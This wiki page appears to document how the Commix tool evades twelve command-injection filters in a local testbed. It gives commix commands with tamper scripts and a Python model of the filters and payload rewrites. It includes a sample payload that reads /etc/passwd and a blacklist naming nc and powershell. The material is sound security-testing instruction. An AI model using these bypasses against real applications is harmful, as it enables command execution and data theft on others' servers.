
Filters bypass examples

Anastasios Stasinopoulos edited this page May 25, 2025 · 2 revisions

The following command injection filter bypass techniques are demonstrated using the official dockerized version of the Commix testbed. This Docker image provides a controlled environment to test various types of command injection vulnerabilities, including:

  • Classic, Blind, and Time-based injections
  • Injections through HTTP headers, cookies, JSON/XML payloads
  • Obfuscated and filtered inputs

Using this testbed, researchers and security professionals can reliably reproduce bypasses and validate the effectiveness of web application firewalls (WAFs), input validation logic, and server-side filters in a safe environment. These examples showcase how Commix can automatically or manually evade common input sanitization techniques such as:

  • Characters that are commonly blacklisted in shell execution (such as semicolon, pipe, or ampersand)
  • Filters that only allow predefined commands
  • Input fields that restrict the number of characters
  • Filters that rely on encoding patterns

These scenarios help demonstrate how Commix's payload crafting, tampering techniques, and options can successfully bypass filters.

Scenario summary (filter script and its blocking mechanism):

  1. lax_domain_name.php: allows only letters, digits, hyphens, and dots, rejecting shell metacharacters
  2. nested_quotes.php: encloses the input within several layers of quotes to complicate escaping
  3. no_space.php: strips all space characters from the input
  4. no_space_no_colon_no_pipe_no_ampersand.php: removes spaces and several common shell metacharacters (colon, pipe, ampersand)
  5. no_space_no_colon_no_pipe_no_ampersand_no_dollar.php: same as 4, but also removes the dollar sign, blocking variable expansion
  6. no_colon_no_pipe_no_ampersand_no_dollar.php: blocks the same metacharacters and the dollar sign, but permits spaces
  7. no_white_chars.php: removes all whitespace characters (tabs and newlines included)
  8. no_white_chars_start_alphanum.php: input must begin with a letter or digit and contain no whitespace
  9. no_white_chars_stop_alnum.php: input must end with a character that is not a letter or digit, and contain no whitespace
  10. simple_stop_alphanum.php: blocks input ending with a letter or digit
  11. simple_start_alphanum.php: requires input to start with a letter or digit and checks for specific keywords
  12. multiple_os_commands_blacklisting.php: detects and blocks known command names often used in exploits

Scenario 1: lax_domain_name.php

Blocking Mechanism:
The filter validates that the input looks like a domain name, using a regex that only allows alphanumeric characters, dots, and hyphens; spaces and shell metacharacters are rejected.

Blocking Mechanism Bypass:
Commix is given a suffix such as d.e.f (via --suffix) that fits the domain pattern, so the injected payload ends in a domain-like string and passes the validation.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" \
--data="addr=127.0.0.1" \
--suffix="d.e.f"

Scenario 2: nested_quotes.php

Blocking Mechanism:
The input is enclosed within multiple nested quotes, so a payload must terminate every enclosing quote correctly before the shell can see it as a separate command.

Blocking Mechanism Bypass:
With --level=3, commix tries additional payload variants, including quote terminations, escape sequences and string concatenations, to break out of the nested quotes and inject commands.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" \
--data="addr=127.0.0.1" \
--level=3

Scenario 3: no_space.php

Blocking Mechanism:
All space characters are stripped from the input, so the command name and its arguments run together into a single word.

Blocking Mechanism Bypass:
Commix uses the space2ifs tamper script to replace spaces with the shell's internal field separator variable $IFS. The variable expands to whitespace when the shell evaluates the command, so argument separation is preserved without a literal space in the request.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Scenario 4: no_space_no_colon_no_pipe_no_ampersand.php

Blocking Mechanism:
The filter removes spaces and the common shell metacharacters colon, pipe, and ampersand, blocking command chaining with | and & as well as argument separation.

Blocking Mechanism Bypass:
Commix uses the file-based technique (--technique=f), which has the vulnerable application write the command output to a file under the web root (--web-root) and then retrieves that file over HTTP, so the result does not have to travel through the characters the filter removes. The space2htab tamper script replaces spaces with tabs, which the shell treats as argument separators just like spaces.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Scenario 5: no_space_no_colon_no_pipe_no_ampersand_no_dollar.php

Blocking Mechanism:
Same as scenario 4, but the dollar sign $ is also removed, which rules out variable expansions such as $IFS or ${VAR}.

Blocking Mechanism Bypass:
Commix again combines the file-based technique (--technique=f) with the space2htab tamper script: tabs need no $ at all, so the payload avoids the dollar sign entirely.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Scenario 6: no_colon_no_pipe_no_ampersand_no_dollar.php

Blocking Mechanism:
Spaces are allowed, but $, |, :, and & are blocked, so variable expansion and the pipe, background and AND chaining operators are unavailable.

Blocking Mechanism Bypass:
Commix uses the same approach as in scenarios 4 and 5: the file-based technique (--technique=f) with the space2htab tamper script.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Scenario 7: no_white_chars.php

Blocking Mechanism:
All whitespace characters are stripped, tabs included, so neither spaces nor the tab trick from scenarios 4 to 6 can separate arguments.

Blocking Mechanism Bypass:
Commix uses the space2ifs tamper script to replace spaces with $IFS. The request itself contains no whitespace, but $IFS expands to whitespace when the shell evaluates the command, which restores the argument separators.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Scenario 8: no_white_chars_start_alphanum.php

Blocking Mechanism:
Input must start with an alphanumeric character, and no whitespace is allowed.

Blocking Mechanism Bypass:
Commix crafts payloads that start with an alphanumeric character to comply with the filter, while replacing spaces with $IFS using the space2ifs tamper script, thus bypassing the whitespace restriction.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Scenario 9: no_white_chars_stop_alnum.php

Blocking Mechanism:
Input must end with a non-alphanumeric character, and whitespace is disallowed.

Blocking Mechanism Bypass:
Commix generates payloads that respect the non-alphanumeric end constraint by appending a safe suffix such as a punctuation character, while spaces are replaced with $IFS (via the space2ifs tamper script) to circumvent the whitespace filtering.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Scenario 10: simple_stop_alphanum.php

Blocking Mechanism:
Input ending with an alphanumeric character is blocked, which rejects payloads that end with a command name or argument.

Blocking Mechanism Bypass:
Commix appends a non-alphanumeric suffix (such as a semicolon ; or whitespace) to the payload, so it passes the filter while the shell still executes it.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" \
--data="addr=127.0.0.1"

Scenario 11: simple_start_alphanum.php

Blocking Mechanism:
The input must start with an alphanumeric character, and the filter additionally checks for specific keywords; a payload that opens with a separator such as ; or | is rejected outright.

Blocking Mechanism Bypass:
Commix prepends benign alphanumeric characters to the payload so that its first character satisfies the check, while the injected command follows and still executes.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" \
--data="addr=127.0.0.1"

Scenario 12: multiple_os_commands_blacklisting.php

Blocking Mechanism:
The filter inspects the input for known command names (such as echo, powershell, nc, whoami) and rejects anything that contains one of them.

Blocking Mechanism Bypass:
Commix applies the uninitializedvariable tamper script, which inserts references to uninitialized shell variables (e.g., ${AB}, ${TB}) between the characters of the command. An unset variable expands to an empty string, so the shell still runs the intended command, but the keyword no longer appears as a contiguous substring. This only works where the payload is expanded by the shell (not inside single quotes) and the chosen variable names are unset on the target.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" \
--data="addr=127.0.0.1" \
--tamper="uninitializedvariable"
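The following is an added example, not code from commix or the testbed. It models the filters of scenarios 3, 4, 5, 7 and 12 as Python functions written from the descriptions on this page (not from the testbed's PHP), and re-implements, in simplified form, what the space2ifs, space2htab and uninitializedvariable tamper scripts are described as doing, so you can see which rewrite survives which filter before running commix. The blacklist words are the ones named on this page; the two-letter variable names are assumed to be unset on the target.

```python
"""Filter models and tamper-style payload rewrites (illustrative, not commix code)."""
import random
import re
import shutil
import string
import subprocess

# ---- Filter models, written from the scenario descriptions on this page.
# ---- Each returns the string that reaches the shell, or None if rejected.

def no_space(s):
    """Scenario 3 / no_space.php: every space character is stripped."""
    return s.replace(" ", "")

def no_space_no_colon_no_pipe_no_ampersand(s):
    """Scenario 4: spaces, ':', '|' and '&' are stripped."""
    return re.sub(r"[ :|&]", "", s)

def no_space_no_colon_no_pipe_no_ampersand_no_dollar(s):
    """Scenario 5: as scenario 4, plus '$' (no $IFS, no ${VAR})."""
    return re.sub(r"[ :|&$]", "", s)

def no_white_chars(s):
    """Scenario 7 / no_white_chars.php: all whitespace, tabs included."""
    return re.sub(r"\s", "", s)

BLACKLIST = ("echo", "powershell", "nc", "whoami")  # command names named on this page

def multiple_os_commands_blacklisting(s):
    """Scenario 12: reject input containing a blacklisted command name."""
    return None if any(cmd in s for cmd in BLACKLIST) else s

# ---- Tamper-style rewrites (simplified re-implementations, not the commix scripts).

def space2ifs(payload):
    """Replace spaces with ${IFS}; it expands to IFS whitespace, so the shell
    still splits arguments. Braces keep '$IFSword' from being read as one name."""
    return payload.replace(" ", "${IFS}")

def space2htab(payload):
    """Replace spaces with tabs; a tab is a blank to the shell, like a space."""
    return payload.replace(" ", "\t")

def uninitializedvariable(payload, seed=1):
    """Split every run of letters with empty expansions such as ${AB}.
    An unset variable expands to nothing, so 'wh${AB}oami' runs as 'whoami',
    but a substring check for 'whoami' no longer matches. Assumes the names
    are unset on the target and the payload sits outside single quotes."""
    rng = random.Random(seed)
    def obfuscate_word(word):
        pieces = [word[0]]
        for prev, ch in zip(word, word[1:]):
            if prev.isalpha() and ch.isalpha():
                name = "".join(rng.choice(string.ascii_uppercase) for _ in range(2))
                pieces.append("${" + name + "}")
            pieces.append(ch)
        return "".join(pieces)
    return " ".join(obfuscate_word(w) if w else w for w in payload.split(" "))

def strip_empty_expansions(s):
    """What the shell does with an unset ${XX}: substitute nothing."""
    return re.sub(r"\$\{[A-Z]{2}\}", "", s)

def survives(filter_fn, payload):
    """True when the payload reaches the shell exactly as it was sent."""
    return filter_fn(payload) == payload

def run_in_sh(cmd):
    """Execute cmd with a local POSIX sh to confirm the rewrite still runs;
    returns stdout, or None when no sh is available."""
    sh = shutil.which("sh")
    if sh is None:
        return None
    return subprocess.run([sh, "-c", cmd], capture_output=True, text=True).stdout

if __name__ == "__main__":
    raw = "cat /etc/passwd"  # constructed sample payload
    filters = [no_space, no_space_no_colon_no_pipe_no_ampersand,
               no_space_no_colon_no_pipe_no_ampersand_no_dollar, no_white_chars]
    rewrites = [("raw", lambda p: p), ("space2ifs", space2ifs), ("space2htab", space2htab)]
    for f in filters:
        for label, rewrite in rewrites:
            state = "passes" if survives(f, rewrite(raw)) else "blocked"
            print(f"{f.__name__:50} {label:10} {state}")
    obf = uninitializedvariable("whoami")
    print(obf, "->", "passes" if multiple_os_commands_blacklisting(obf) else "blocked")
    print(run_in_sh(space2ifs("echo hello world")))
```

Two details worth keeping in mind when reading the output: the dollar-sign filter of scenario 5 defeats space2ifs but not space2htab, while the whitespace filter of scenario 7 does the reverse, which is why the page pairs each scenario with a different tamper script; and the ${IFS} and ${XX} tricks rely on shell expansion, so they do nothing for a payload that lands inside single quotes.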
